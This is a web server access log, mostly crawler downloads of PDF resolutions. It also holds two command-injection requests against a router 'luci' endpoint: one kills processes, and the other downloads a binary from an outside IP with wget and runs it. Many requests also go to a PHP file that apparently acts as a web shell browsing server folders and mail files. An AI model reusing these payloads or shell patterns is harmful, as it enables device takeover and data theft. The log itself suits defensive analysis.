47.128.46.184 - - [22/Jun/2024:11:46:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.46.184 - - [22/Jun/2024:11:46:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.46.184 - - [22/Jun/2024:11:46:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.46.184 - - [22/Jun/2024:11:46:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.46.184 - - [22/Jun/2024:11:46:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.46.184 - - [22/Jun/2024:11:46:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
23.22.35.162 - - [22/Jun/2024:11:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/1140.pdf HTTP/1.1" 200 338761
172.22.2.4 - - [22/Jun/2024:11:45:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.70.240.171 - - [22/Jun/2024:11:46:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/2673.pdf HTTP/1.1" 200 265876
3.224.220.101 - - [22/Jun/2024:11:46:50 -0500] "GET /BLA/resoluciones/AUTOS%202018/0545.pdf HTTP/1.1" 200 258025
23.22.35.162 - - [22/Jun/2024:11:46:53 -0500] "GET /BLA/resoluciones/AUTOS%202018/1139.pdf HTTP/1.1" 200 313544
3.224.220.101 - - [22/Jun/2024:11:46:58 -0500] "GET /BLA/resoluciones/AUTOS%202019/2672.pdf HTTP/1.1" 200 255695
52.70.240.171 - - [22/Jun/2024:11:47:02 -0500] "GET /BLA/resoluciones/AUTOS%202018/0544.pdf HTTP/1.1" 200 264630
52.70.240.171 - - [22/Jun/2024:11:47:06 -0500] "GET /BLA/resoluciones/AUTOS%202018/1137.pdf HTTP/1.1" 200 340283
3.224.220.101 - - [22/Jun/2024:11:47:09 -0500] "GET /BLA/resoluciones/AUTOS%202019/2671.pdf HTTP/1.1" 200 254528
201.245.192.253 - - [22/Jun/2024:11:47:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
23.22.35.162 - - [22/Jun/2024:11:47:13 -0500] "GET /BLA/resoluciones/AUTOS%202018/0541.PDF HTTP/1.1" 200 10954838
201.245.192.253 - - [22/Jun/2024:11:47:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:11:47:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/1136.pdf HTTP/1.1" 200 338487
23.22.35.162 - - [22/Jun/2024:11:47:22 -0500] "GET /BLA/resoluciones/AUTOS%202019/2670.pdf HTTP/1.1" 200 264460
3.224.220.101 - - [22/Jun/2024:11:47:26 -0500] "GET /BLA/resoluciones/AUTOS%202018/1135.pdf HTTP/1.1" 200 340505
52.70.240.171 - - [22/Jun/2024:11:47:30 -0500] "GET /BLA/resoluciones/AUTOS%202019/2669.pdf HTTP/1.1" 200 258457
47.128.124.190 - - [22/Jun/2024:11:47:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1151-1200&f=00001160.tif HTTP/1.1" 200 17694
47.128.124.190 - - [22/Jun/2024:11:47:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.124.190 - - [22/Jun/2024:11:47:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.124.190 - - [22/Jun/2024:11:47:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
47.128.124.190 - - [22/Jun/2024:11:47:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.124.190 - - [22/Jun/2024:11:47:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.124.190 - - [22/Jun/2024:11:47:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.124.190 - - [22/Jun/2024:11:47:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.124.190 - - [22/Jun/2024:11:47:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.124.190 - - [22/Jun/2024:11:47:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.124.190 - - [22/Jun/2024:11:47:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
172.22.2.4 - - [22/Jun/2024:11:45:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
23.22.35.162 - - [22/Jun/2024:11:47:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/0533.PDF HTTP/1.1" 200 9640643
23.22.35.162 - - [22/Jun/2024:11:47:37 -0500] "GET /BLA/resoluciones/AUTOS%202018/1132.pdf HTTP/1.1" 200 286548
52.70.240.171 - - [22/Jun/2024:11:47:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/0531.pdf HTTP/1.1" 200 297854
3.224.220.101 - - [22/Jun/2024:11:47:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/2668.pdf HTTP/1.1" 200 255378
3.224.220.101 - - [22/Jun/2024:11:47:49 -0500] "GET /BLA/resoluciones/AUTOS%202018/0530.pdf HTTP/1.1" 200 263560
52.70.240.171 - - [22/Jun/2024:11:47:54 -0500] "GET /BLA/resoluciones/AUTOS%202018/1131.pdf HTTP/1.1" 200 321802
52.70.240.171 - - [22/Jun/2024:11:47:58 -0500] "GET /BLA/resoluciones/AUTOS%202019/2667.pdf HTTP/1.1" 200 266722
23.22.35.162 - - [22/Jun/2024:11:48:02 -0500] "GET /BLA/resoluciones/AUTOS%202018/0529.pdf HTTP/1.1" 200 310385
3.224.220.101 - - [22/Jun/2024:11:48:06 -0500] "GET /BLA/resoluciones/AUTOS%202018/1127.pdf HTTP/1.1" 200 337836
52.70.240.171 - - [22/Jun/2024:11:48:09 -0500] "GET /BLA/resoluciones/AUTOS%202019/2666.pdf HTTP/1.1" 200 248393
52.70.240.171 - - [22/Jun/2024:11:48:14 -0500] "GET /BLA/resoluciones/AUTOS%202018/1126.pdf HTTP/1.1" 200 337126
52.70.240.171 - - [22/Jun/2024:11:48:17 -0500] "GET /BLA/resoluciones/AUTOS%202018/0528.pdf HTTP/1.1" 200 1216386
201.245.192.253 - - [22/Jun/2024:11:48:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.70.240.171 - - [22/Jun/2024:11:48:22 -0500] "GET /BLA/resoluciones/AUTOS%202019/2663.pdf HTTP/1.1" 200 302446
52.22.236.30 - - [22/Jun/2024:11:48:22 -0500] "GET / HTTP/1.1" 200 319
47.128.124.177 - - [22/Jun/2024:11:48:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.124.177 - - [22/Jun/2024:11:48:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.124.177 - - [22/Jun/2024:11:48:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.124.177 - - [22/Jun/2024:11:48:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.124.177 - - [22/Jun/2024:11:48:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.124.177 - - [22/Jun/2024:11:48:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.124.177 - - [22/Jun/2024:11:48:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.124.177 - - [22/Jun/2024:11:48:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.124.177 - - [22/Jun/2024:11:48:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.124.177 - - [22/Jun/2024:11:48:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300&f=00001275.tif HTTP/1.1" 200 17697
47.128.124.177 - - [22/Jun/2024:11:48:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
23.22.35.162 - - [22/Jun/2024:11:48:26 -0500] "GET /BLA/resoluciones/AUTOS%202018/1123.pdf HTTP/1.1" 200 338134
23.22.35.162 - - [22/Jun/2024:11:48:30 -0500] "GET /BLA/resoluciones/AUTOS%202018/0527.pdf HTTP/1.1" 200 286825
52.70.240.171 - - [22/Jun/2024:11:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202019/2661.pdf HTTP/1.1" 200 318836
52.70.240.171 - - [22/Jun/2024:11:48:37 -0500] "GET /BLA/resoluciones/AUTOS%202018/1121.pdf HTTP/1.1" 200 322190
3.224.220.101 - - [22/Jun/2024:11:48:45 -0500] "GET /BLA/resoluciones/AUTOS%202018/1120.pdf HTTP/1.1" 200 333406
23.22.35.162 - - [22/Jun/2024:11:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/0526.PDF HTTP/1.1" 200 11316540
52.70.240.171 - - [22/Jun/2024:11:48:49 -0500] "GET /BLA/resoluciones/AUTOS%202018/0521.pdf HTTP/1.1" 200 297395
23.22.35.162 - - [22/Jun/2024:11:48:54 -0500] "GET /BLA/resoluciones/AUTOS%202018/1119.pdf HTTP/1.1" 200 718379
3.224.220.101 - - [22/Jun/2024:11:48:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/0519.pdf HTTP/1.1" 200 266957
52.70.240.171 - - [22/Jun/2024:11:49:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/2660.pdf HTTP/1.1" 200 283383
23.22.35.162 - - [22/Jun/2024:11:49:05 -0500] "GET /BLA/resoluciones/AUTOS%202018/1116.pdf HTTP/1.1" 200 327169
47.128.27.226 - - [22/Jun/2024:11:49:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2546.doc HTTP/1.1" 200 2738
3.224.220.101 - - [22/Jun/2024:11:49:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/518.pdf HTTP/1.1" 200 1225351
3.224.220.101 - - [22/Jun/2024:11:49:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/2659.pdf HTTP/1.1" 200 290537
52.70.240.171 - - [22/Jun/2024:11:49:17 -0500] "GET /BLA/resoluciones/AUTOS%202018/0518.pdf HTTP/1.1" 200 330827
201.245.192.253 - - [22/Jun/2024:11:49:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:11:49:22 -0500] "GET /BLA/resoluciones/AUTOS%202018/1115.pdf HTTP/1.1" 200 336200
216.245.221.92 - - [22/Jun/2024:11:49:24 -0500] "HEAD / HTTP/1.1" 200 -
52.70.240.171 - - [22/Jun/2024:11:49:26 -0500] "GET /BLA/resoluciones/AUTOS%202019/2657.pdf HTTP/1.1" 200 257765
52.70.240.171 - - [22/Jun/2024:11:49:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/1114.pdf HTTP/1.1" 200 337627
3.224.220.101 - - [22/Jun/2024:11:49:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/0517.pdf HTTP/1.1" 200 305533
3.224.220.101 - - [22/Jun/2024:11:49:37 -0500] "GET /BLA/resoluciones/AUTOS%202019/2655.pdf HTTP/1.1" 200 265161
23.22.35.162 - - [22/Jun/2024:11:49:41 -0500] "GET /BLA/resoluciones/AUTOS%202018/0515.pdf HTTP/1.1" 200 546055
52.70.240.171 - - [22/Jun/2024:11:49:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/1113.pdf HTTP/1.1" 200 325925
3.224.220.101 - - [22/Jun/2024:11:49:49 -0500] "GET /BLA/resoluciones/AUTOS%202019/2654.pdf HTTP/1.1" 200 261196
3.224.220.101 - - [22/Jun/2024:11:49:54 -0500] "GET /BLA/resoluciones/AUTOS%202018/0512.pdf HTTP/1.1" 200 322657
3.224.220.101 - - [22/Jun/2024:11:49:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/1111.pdf HTTP/1.1" 200 338826
47.128.99.44 - - [22/Jun/2024:11:49:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion2020%5CClasificaci%F3n+de+impacto+ambiental+para+tr%E1mites+de+licencia+de+construcci%F3n+en+el+Distrito+Capital&f=PM04-PR34-F1Solicitud+clasificacion+de+impacto+ambiental+lista+chequeo.xls HTTP/1.1" 200 3187
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.99.44 - - [22/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_xls HTTP/1.1" 200 1034
3.224.220.101 - - [22/Jun/2024:11:50:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/2651.pdf HTTP/1.1" 200 271164
47.128.99.44 - - [22/Jun/2024:11:50:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
3.224.220.101 - - [22/Jun/2024:11:50:05 -0500] "GET /BLA/resoluciones/AUTOS%202018/0511.pdf HTTP/1.1" 200 1810104
52.70.240.171 - - [22/Jun/2024:11:50:09 -0500] "GET /BLA/resoluciones/AUTOS%202019/2650.pdf HTTP/1.1" 200 260120
23.22.35.162 - - [22/Jun/2024:11:50:14 -0500] "GET /BLA/resoluciones/AUTOS%202018/1101.pdf HTTP/1.1" 200 1667546
201.245.192.253 - - [22/Jun/2024:11:50:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.70.240.171 - - [22/Jun/2024:11:50:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/0510.pdf HTTP/1.1" 200 339415
52.70.240.171 - - [22/Jun/2024:11:50:21 -0500] "GET /BLA/resoluciones/AUTOS%202019/2648.pdf HTTP/1.1" 200 277132
52.70.240.171 - - [22/Jun/2024:11:50:26 -0500] "GET /BLA/resoluciones/AUTOS%202018/0509.pdf HTTP/1.1" 200 341475
3.224.220.101 - - [22/Jun/2024:11:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202018/1081.pdf HTTP/1.1" 200 2657378
52.70.240.171 - - [22/Jun/2024:11:50:34 -0500] "GET /BLA/resoluciones/AUTOS%202019/2647.pdf HTTP/1.1" 200 269423
3.224.220.101 - - [22/Jun/2024:11:50:37 -0500] "GET /BLA/resoluciones/AUTOS%202018/0508.pdf HTTP/1.1" 200 334048
3.224.220.101 - - [22/Jun/2024:11:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/1080.pdf HTTP/1.1" 200 292818
23.22.35.162 - - [22/Jun/2024:11:50:45 -0500] "GET /BLA/resoluciones/AUTOS%202018/0507.pdf HTTP/1.1" 200 338934
47.128.110.247 - - [22/Jun/2024:11:50:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2843.pdf HTTP/1.1" 200 2739
52.70.240.171 - - [22/Jun/2024:11:50:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/2646.pdf HTTP/1.1" 200 265183
52.70.240.171 - - [22/Jun/2024:11:50:53 -0500] "GET /BLA/resoluciones/AUTOS%202018/1075.pdf HTTP/1.1" 200 283360
23.22.35.162 - - [22/Jun/2024:11:50:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/0506.pdf HTTP/1.1" 200 300244
3.224.220.101 - - [22/Jun/2024:11:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/2645.pdf HTTP/1.1" 200 686649
3.224.220.101 - - [22/Jun/2024:11:51:05 -0500] "GET /BLA/resoluciones/AUTOS%202018/1072.pdf HTTP/1.1" 200 265768
52.70.240.171 - - [22/Jun/2024:11:51:09 -0500] "GET /BLA/resoluciones/AUTOS%202018/0505.pdf HTTP/1.1" 200 266089
23.22.35.162 - - [22/Jun/2024:11:51:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/2644.pdf HTTP/1.1" 200 680549
201.245.192.253 - - [22/Jun/2024:11:51:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
23.22.35.162 - - [22/Jun/2024:11:51:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/1070.pdf HTTP/1.1" 200 277942
52.70.240.171 - - [22/Jun/2024:11:51:22 -0500] "GET /BLA/resoluciones/AUTOS%202019/2643.pdf HTTP/1.1" 200 271846
23.22.35.162 - - [22/Jun/2024:11:51:26 -0500] "GET /BLA/resoluciones/AUTOS%202018/0504.pdf HTTP/1.1" 200 309721
3.224.220.101 - - [22/Jun/2024:11:51:30 -0500] "GET /BLA/resoluciones/AUTOS%202018/1068.pdf HTTP/1.1" 200 275796
52.70.240.171 - - [22/Jun/2024:11:51:34 -0500] "GET /BLA/resoluciones/AUTOS%202019/2642.pdf HTTP/1.1" 200 280566
47.128.121.164 - - [22/Jun/2024:11:51:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4271.pdf HTTP/1.1" 200 3030
3.224.220.101 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202018/0503.pdf HTTP/1.1" 200 310258
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.121.164 - - [22/Jun/2024:11:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.121.164 - - [22/Jun/2024:11:51:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
3.224.220.101 - - [22/Jun/2024:11:51:41 -0500] "GET /BLA/resoluciones/AUTOS%202018/1067.pdf HTTP/1.1" 200 278343
173.252.83.4 - - [22/Jun/2024:11:51:43 -0500] "GET /images/01052024%20Nota%20apertura%20senderos%20Cerros.jpeg HTTP/1.1" 200 130671
52.70.240.171 - - [22/Jun/2024:11:51:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/2641.pdf HTTP/1.1" 200 681560
3.224.220.101 - - [22/Jun/2024:11:51:49 -0500] "GET /BLA/resoluciones/AUTOS%202018/0501.pdf HTTP/1.1" 200 733048
52.70.240.171 - - [22/Jun/2024:11:51:53 -0500] "GET /BLA/resoluciones/AUTOS%202018/1066.pdf HTTP/1.1" 200 279132
23.22.35.162 - - [22/Jun/2024:11:51:58 -0500] "GET /BLA/resoluciones/AUTOS%202018/0499.pdf HTTP/1.1" 200 340147
40.77.167.32 - - [22/Jun/2024:11:52:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2984.pdf HTTP/1.1" 200 266379
23.22.35.162 - - [22/Jun/2024:11:52:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/2637.pdf HTTP/1.1" 200 269938
3.224.220.101 - - [22/Jun/2024:11:52:05 -0500] "GET /BLA/resoluciones/AUTOS%202018/1065.pdf HTTP/1.1" 200 265422
52.70.240.171 - - [22/Jun/2024:11:52:09 -0500] "GET /BLA/resoluciones/AUTOS%202018/0498.pdf HTTP/1.1" 200 376106
201.245.192.253 - - [22/Jun/2024:11:52:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.70.240.171 - - [22/Jun/2024:11:52:13 -0500] "GET /BLA/resoluciones/AUTOS%202019/2632.pdf HTTP/1.1" 200 271202
201.245.192.253 - - [22/Jun/2024:11:52:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
23.22.35.162 - - [22/Jun/2024:11:52:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/1062.pdf HTTP/1.1" 200 282327
52.70.240.171 - - [22/Jun/2024:11:52:21 -0500] "GET /BLA/resoluciones/AUTOS%202018/0496.pdf HTTP/1.1" 200 341121
23.22.35.162 - - [22/Jun/2024:11:52:26 -0500] "GET /BLA/resoluciones/AUTOS%202019/2621.pdf HTTP/1.1" 200 301977
173.252.95.112 - - [22/Jun/2024:11:52:27 -0500] "GET /serrania-el-zuque-de-cantera-en-los-anos-60-a-espacio-de-restauracion-ambiental-y-mitigacion-del-riesgo.html HTTP/1.1" 200 841
173.252.95.1 - - [22/Jun/2024:11:52:27 -0500] "GET /serrania-el-zuque-de-cantera-en-los-anos-60-a-espacio-de-restauracion-ambiental-y-mitigacion-del-riesgo.html HTTP/1.1" 200 841
47.128.119.140 - - [22/Jun/2024:11:52:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150904-0405-571000.txt&ft=info HTTP/1.1" 200 3748
47.128.119.140 - - [22/Jun/2024:11:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.119.140 - - [22/Jun/2024:11:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.119.140 - - [22/Jun/2024:11:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.119.140 - - [22/Jun/2024:11:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.119.140 - - [22/Jun/2024:11:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
52.70.240.171 - - [22/Jun/2024:11:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/1061.pdf HTTP/1.1" 200 257017
47.128.119.140 - - [22/Jun/2024:11:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.119.140 - - [22/Jun/2024:11:52:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.119.140 - - [22/Jun/2024:11:52:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.119.140 - - [22/Jun/2024:11:52:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
23.22.35.162 - - [22/Jun/2024:11:52:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/0494.pdf HTTP/1.1" 200 335267
172.22.2.4 - - [22/Jun/2024:11:50:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.70.240.171 - - [22/Jun/2024:11:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202019/2620.pdf HTTP/1.1" 200 288502
52.70.240.171 - - [22/Jun/2024:11:52:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/1055.pdf HTTP/1.1" 200 648614
52.70.240.171 - - [22/Jun/2024:11:52:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/493.pdf HTTP/1.1" 200 287774
52.70.240.171 - - [22/Jun/2024:11:52:49 -0500] "GET /BLA/resoluciones/AUTOS%202018/0493.pdf HTTP/1.1" 200 337156
3.224.220.101 - - [22/Jun/2024:11:52:53 -0500] "GET /BLA/resoluciones/AUTOS%202019/2619.pdf HTTP/1.1" 200 929537
23.22.35.162 - - [22/Jun/2024:11:52:58 -0500] "GET /BLA/resoluciones/AUTOS%202018/1054.pdf HTTP/1.1" 200 546066
23.22.35.162 - - [22/Jun/2024:11:53:01 -0500] "GET /BLA/resoluciones/AUTOS%202019/2618.pdf HTTP/1.1" 200 1204827
141.98.83.197 - - [22/Jun/2024:11:53:04 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [22/Jun/2024:11:53:05 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
23.22.35.162 - - [22/Jun/2024:11:53:06 -0500] "GET /BLA/resoluciones/AUTOS%202018/0492.pdf HTTP/1.1" 200 335183
23.22.35.162 - - [22/Jun/2024:11:53:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/1053.pdf HTTP/1.1" 200 1097929
52.70.240.171 - - [22/Jun/2024:11:53:13 -0500] "GET /BLA/resoluciones/AUTOS%202018/0491.pdf HTTP/1.1" 200 342264
201.245.192.253 - - [22/Jun/2024:11:53:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
23.22.35.162 - - [22/Jun/2024:11:53:18 -0500] "GET /BLA/resoluciones/AUTOS%202019/2617.pdf HTTP/1.1" 200 1644066
47.128.110.242 - - [22/Jun/2024:11:53:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=1536.pdf HTTP/1.1" 200 2739
3.224.220.101 - - [22/Jun/2024:11:53:22 -0500] "GET /BLA/resoluciones/AUTOS%202018/1052.pdf HTTP/1.1" 200 469135
52.70.240.171 - - [22/Jun/2024:11:53:26 -0500] "GET /BLA/resoluciones/AUTOS%202019/2616.pdf HTTP/1.1" 200 342975
